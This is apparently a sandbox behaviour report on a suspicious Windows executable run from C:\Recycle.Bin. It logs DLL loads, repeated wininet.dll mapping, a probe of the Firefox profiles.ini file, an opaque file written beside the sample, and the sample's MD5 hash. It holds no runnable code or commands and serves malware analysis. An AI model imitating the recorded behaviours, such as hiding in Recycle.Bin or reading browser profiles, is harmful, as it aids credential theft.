Section loaded Path: C:\WINDOWS\system32\sensapi.dll Access: query and write and read and execute Type: image Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2052874690
Section loaded Path: \KnownDlls\msapsspc.dll Access: write and read and execute Type: unknown Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid object name not found 2052896609
Section loaded Path: C:\WINDOWS\system32\msapsspc.dll Access: query and write and read and execute Type: image Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2052901557
Section loaded Path: \KnownDlls\MSVCRT40.dll Access: write and read and execute Type: unknown Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 2052908035
Section loaded Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2052911266
Section loaded Path: \BaseNamedObjects\SENS Information Cache Access: read Type: unknown Baseaddress: 1FA0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2052959015
Section loaded Path: \KnownDlls\schannel.dll Access: write and read and execute Type: unknown Baseaddress: 1FA0000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 2052971127
Section loaded Path: C:\WINDOWS\system32\schannel.dll Access: query and write and read and execute Type: image Baseaddress: 767F0000 Size: 163840 Protection: read write Mapped to pid: own pid success or wait 2052972888
Section loaded Path: \KnownDlls\digest.dll Access: write and read and execute Type: unknown Baseaddress: 767F0000 Size: 163840 Protection: read write Mapped to pid: own pid object name not found 2053036336
Section loaded Path: C:\WINDOWS\system32\digest.dll Access: query and write and read and execute Type: image Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2053046139
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2053080117
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2053081545
Section loaded Path: \KnownDlls\msnsspc.dll Access: write and read and execute Type: unknown Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 2053081856
Section loaded Path: C:\WINDOWS\system32\msnsspc.dll Access: query and write and read and execute Type: image Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid success or wait 2053090410
Section loaded Path: \KnownDlls\MSVCRT40.dll Access: write and read and execute Type: unknown Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid object name not found 2053097858
Section loaded Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2053099935
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2053125457
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2053126248
Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: write and read and execute Type: commit Baseaddress: 2950000 Size: 139264 Protection: execute Mapped to pid: own pid success or wait 2053185329
Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: query and write and read and execute Type: image Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2053194147
Section loaded Path: \KnownDlls\cryptdll.dll Access: write and read and execute Type: unknown Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 2053210628
Section loaded Path: C:\WINDOWS\system32\cryptdll.dll Access: query and write and read and execute Type: image Baseaddress: 76790000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 2053217450
Section loaded Path: \KnownDlls\MPRAPI.dll Access: write and read and execute Type: unknown Baseaddress: 76790000 Size: 49152 Protection: read write Mapped to pid: own pid object name not found 2053496783
Section loaded Path: C:\WINDOWS\system32\mprapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D40000 Size: 98304 Protection: read write Mapped to pid: own pid success or wait 2053500947
Section loaded Path: \KnownDlls\ACTIVEDS.dll Access: write and read and execute Type: unknown Baseaddress: 76D40000 Size: 98304 Protection: read write Mapped to pid: own pid object name not found 2053514563
Section loaded Path: C:\WINDOWS\system32\activeds.dll Access: query and write and read and execute Type: image Baseaddress: 77CC0000 Size: 204800 Protection: read write Mapped to pid: own pid success or wait 2053520460
Section loaded Path: \KnownDlls\adsldpc.dll Access: write and read and execute Type: unknown Baseaddress: 77CC0000 Size: 204800 Protection: read write Mapped to pid: own pid object name not found 2053528764
Section loaded Path: C:\WINDOWS\system32\adsldpc.dll Access: query and write and read and execute Type: image Baseaddress: 76E10000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2053533991
Section loaded Path: \KnownDlls\hnetcfg.dll Access: write and read and execute Type: unknown Baseaddress: 76E10000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 2053641999
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2053644244
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: 2960000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2053682090
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2053689718
Thread delayed Time: 0 TID: 4214 success or wait 2053765945
Thread delayed Time: 0 TID: 4214 success or wait 2053766216
Thread delayed Time: 0 TID: 4214 success or wait 2053768445
Thread delayed Time: 0 TID: 4214 success or wait 2053769820
File opened Path: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\profiles.ini Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false object name not found 2053832341
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2077616092
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2077617059
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2077618890
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2077628323
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2077688542
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2077694458
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2077716296
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2077724477
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2077726408
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2077727299
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2105181057
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2105181961
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2105186793
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2105188019
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106050990
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106062448
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106064892
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106065760
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106141651
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106142943
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106146130
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106147197
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106173327
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106174496
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106269444
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106270267
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106530383
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106531538
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106534722
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106535513
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106834743
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106836002
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106839763
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106840663
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106843147
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106843932
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2106929386
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2106931102
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107703898
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107704731
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107708174
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107708975
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107711363
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107712149
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107714611
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107715317
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107717398
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107718185
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107720565
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107721354
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107723432
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107724219
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107726547
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107727332
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2107729482
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2107730270
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108251639
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108254055
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108260981
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108262331
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108266115
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108267075
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108269502
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108270286
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108330747
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108332558
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108337032
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108338179
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108429455
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108430171
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108541181
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108541970
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108798383
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108799196
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108812811
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108813610
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108883421
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108884227
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2108889101
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2108889893
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2109007279
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2109008125
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2110281978
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110286620
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2110288190
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110288519
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2110289801
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110290170
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2110291213
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110291539
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2110292393
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110292718
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110294005
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110576007
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110642959
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110644098
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110709174
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110710935
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110785210
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2110801523
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2111548591
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2111550471
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2111551484
Thread delayed Time: 80 TID: 8584 success or wait 2111552008
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2397920540
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2397934441
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2397937349
+ Sections
+ General
Start time: 05:48:02
Start date: 01/12/2011
Path: C:\Recycle.Bin\B6232F3AC2C.exe
Commandline: C:\Recycle.Bin\B6232F3AC2C.exe
Imagebase: 0x400000
File size: 254976 bytes
MD5 hash: 62D0915F2D31D0A060671D31419A0B80
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\kernel32.dll synchronize and generic read synchronous io non alert and non directory file and random access success or wait 5 403AA1
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 C44E4E
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 C44E4E
\pipe\globpluginsuninstallpipe read attributes and synchronize and generic write synchronous io non alert and non directory file false object name not found 1 C271FC
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 C26A36
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Recycle.Bin\ read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident object name collision 1 BD0179
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic write normal synchronous io non alert and non directory file success or wait 1 C44E4E
+ File written
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 1 C44E17
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 1 C3818F
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 1 C26699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 C266D5
C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 1 C26717
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 1 C267A2
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll PositionInformation Offset: 60 success or wait 4 C2667A
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
none query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
\KnownDlls\advapi32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\comdlg32.dll write and read and execute unknown 763B0000 299008 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\crypt32.dll write and read and execute unknown 77F60000 483328 own pid read write object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\msimg32.dll write and read and execute unknown 77B20000 73728 own pid read write object name not found 1
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
\KnownDlls\version.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
